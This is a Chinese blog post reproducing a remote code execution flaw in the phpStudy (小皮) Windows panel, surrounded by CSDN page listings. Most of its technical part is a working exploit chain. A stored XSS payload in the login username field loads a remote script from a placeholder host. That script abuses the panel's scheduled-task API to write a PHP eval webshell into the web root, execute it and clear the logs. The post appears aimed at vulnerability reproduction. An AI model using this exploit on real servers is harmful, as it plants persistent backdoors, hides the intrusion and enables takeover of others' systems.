phpstudy小皮Windows面板RCE漏洞

最新推荐文章于 2024-04-22 12:49:48 发布
最新推荐文章于 2024-04-22 12:49:48 发布
阅读量441 收藏
点赞数 1
分类专栏: # 漏洞复现 文章标签: windows php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129892312
版权

文章目录

简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等

概述

phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。

影响版本

小皮windows面板V0.102以及以下版本
官网版本已修复该漏洞,漏洞版本下载:http://www.ddooo.com/softdown/224005.htm

漏洞复现

安装成功后弹出初始账号密码:
在这里插入图片描述

尝试几次错误的用户名及密码(验证码需要正确),发现错误的用户名会被记录到首页的操作日志中
在这里插入图片描述
发现该漏洞大哥可能就是某一瞬间的突发奇想,尝试登陆框能否插入xss
在这里插入图片描述
漏洞就出现在登陆窗口处,一个存储型XSS,登陆框没有做限制,并且日志会记录失败的用户名,登陆后会将尝试的用户名直接显示在小皮首页当中。
可以插入任意XSS代码,可以结合phpstudy中内置计划任务写入webshell
在这里插入图片描述
在这里插入图片描述
该系统后台有个计划任务的功能,其中可以执行系统命令,所以结合登录处的XSS可以通过写入计划任务来达到命令执行的目的

在VPS部署需要插入的 poc.js 文件(写入目录根据本地实际情况修改)

functionpoc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    varid=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
    },"json");
  },"json");
}
functionsave(){
  vardata=newObject();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="14";
  data.minute="20";
  data.shell='echo "<?php @eval($_POST[123]);?>" >D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

<script src=http://xxxxx.top:888/POC.js></script>		#插入登陆框中,加载远程js代码

在这里插入图片描述
在这里插入图片描述

修复方式

更新到最新版的小皮面板,最新版小皮面板已经修复该漏洞。

今天是 几号
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHPstudy小皮面板使用教程及详细解释
07-08
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的... 本文章是对PHP study小皮面板功能以及用处的详细解释。
小皮面板和宝塔面板哪个好
hmz856的博客
05-16 1830
小皮面板Windows系统的Web面板还在测试中,正式版用的多Linux Docker容器面板,它采用为Docker核心而开发,内存要求最低512MB,推荐768MB以上,纯面板约占系统60MB内存。宝塔Windows面板和宝塔Linux面板都是免费使用的,面板功能全,好多人使用,宝塔面板支持一键管理服务器,集成LAMP/LNMP环境安装,网站、FTP、数据库、文件管理、软件安装等功能。即便小皮面板是老牌的,但是重构的产品在功能上不一定比宝塔面板有优势,而且从更新效率上,宝塔面板的更新频率是比较快的。
Windows 小皮 phpstudy 命令行安装与配置
我有一个魔盒的博客
05-18 1139
开机自启选项”配置文件:C:\phpstudy_pro/COM/xp.ini。
如何在Windows11上通过PHPStudy小皮面板快速大家MySQL环境
Python私教
03-16 383
链接:https://pan.baidu.com/s/1gcaiK54yW7DcrYld22V06A。首先,下载小皮面板:https://www.xp.cn/–来自百度网盘超级会员V9的分享。
phpstudy-linux您修改了面板程序,这是不允许的 请进入服务器命令行输入xp查看修复方法 +解决方法
jiuchengzhijia的博客
02-15 3144
phpstudy-linux您修改了面板程序,这是不允许的。 请进入服务器命令行输入xp查看修复方法!+解决方法 不能修复 当你看到这些时候的说明你确实是成功被入侵了可能还被植入了webshell
windows使用nginx部署vue项目,另加小皮面板Apache部署
qq_45757927的博客
02-29 427
启动后在浏览器输入localhost:80,跳转到80是因为我们在nginx.conf文件里配置的是80端口。打开cmd命令行进入该文件夹,输入npm run build,打包完成后会生成一个dist文件夹。把vue项目dist文件夹,复制到nginx文件夹html内,并改名为你自定义的名字。保存后,打开cmd命令行,cd到nginx文件夹下,输入start nginx启动。官网:http://nginx.org/en/download.html。可以看到我们正常跳转到了页面。❗依照下图进行编辑配置。
漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 4675
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE
phpstudy搭建渗透测试环境
Z_l123的博客
01-12 627
工具 phpstudy2018 靶场平台 DWVA SQL 步骤 1.运行phpstudy并打开phpstudy网站根目录 2.将下载好的靶场平台安装包放进去并解压 3.DWVA:dvwa>config>config.inc.php.dist 修改为下图,保存后将文件名config.inc.php.dist改为config.inc.php 4.火狐访问http://127.0.0.1/dvwa 5.在phpstudy中 其他选项菜单>PH..
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 871
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
复现PhpStudy2018漏洞复现&检测和执行POC脚本
qq_45031509的博客
07-17 1679
复现PhpStudy2018漏洞复现&检测和执行POC脚本
RCE漏洞:phpstudy漏洞复现
一个努力学习网安的小牛马
10-16 232
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
PhpStudy客户端和小皮Windows web面板
08-15
PhpStudy客户端和小皮Windows web面板
小皮Phpstudy面板存在任意命令执行漏洞-公开版本
04-20
2. 虽然本漏洞已经提交给相关机构,漏洞目前仍处于1Day,传播并造成危害,责任自负。 3. 读取、使用、解析本文档的读者,默认认同上述条款,否则请自行删除本资料。 4. 本文档内容完整版取自渊龙Sec安全团队内部漏洞...
PHPStudy小皮)ssl证书批量替换工具
01-26
windows服务器,PHPStudy小皮)服务环境下,ssl证书批量替换工具,不用一个一个的去更新替换
详解phpstudy linux web面板小皮面板)V0.2版本正式发布
10-16
小皮面板,是由phpStudy官方团队针对Linux服务器开发推出的一款服务器环境搭建以及管理工具。这篇文章主要介绍了phpstudy linux web面板小皮面板)V0.2版本正式发布,需要的朋友可以参考下
双链表实现,增 删 改 查(基础详细版)
最新发布
weixin_70873145的博客
04-22 750
这里只算是基础部分,当然最主要的是学会如何使用手里的工具。
45、二叉树-二叉树的右视图
qq_29434541的博客
04-19 304
【代码】45、二叉树-二叉树的右视图。
java 词法分析练习
boslm的博客
04-20 351
java词法分析代码练习
双向链表(带头双向循环链表)的实现
2402_82658387的博客
04-19 1139
双向链表的实现
PhPstudy小皮面板
02-24
PHPStudy小皮面板是一款基于Windows平台的PHP开发环境集成工具,它提供了一键安装和管理PHP、MySQL、Apache等常用的Web开发环境。小皮面板的特点如下: 1. 一键安装:PHPStudy小皮面板提供了一键安装功能,可以快速搭建PHP开发环境,无需手动配置。 2. 简单易用:小皮面板的界面简洁友好,操作简单,适合初学者使用。 3. 多版本支持:小皮面板支持多个PHP版本的切换,可以根据项目需求选择不同的PHP版本。 4. 集成工具:小皮面板内置了常用的开发工具,如phpMyAdmin、Redis、Memcached等,方便开发者进行数据库管理和缓存操作。 5. 虚拟主机管理:小皮面板支持虚拟主机管理,可以方便地创建和管理多个网站。 6. 安全性:小皮面板提供了安全防护功能,可以对网站进行安全加固和防护。 7. 插件扩展:小皮面板支持插件扩展,可以根据需要安装和使用各种插件。 总之,PHPStudy小皮面板是一款方便易用的PHP开发环境集成工具,适合初学者和中级开发者使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值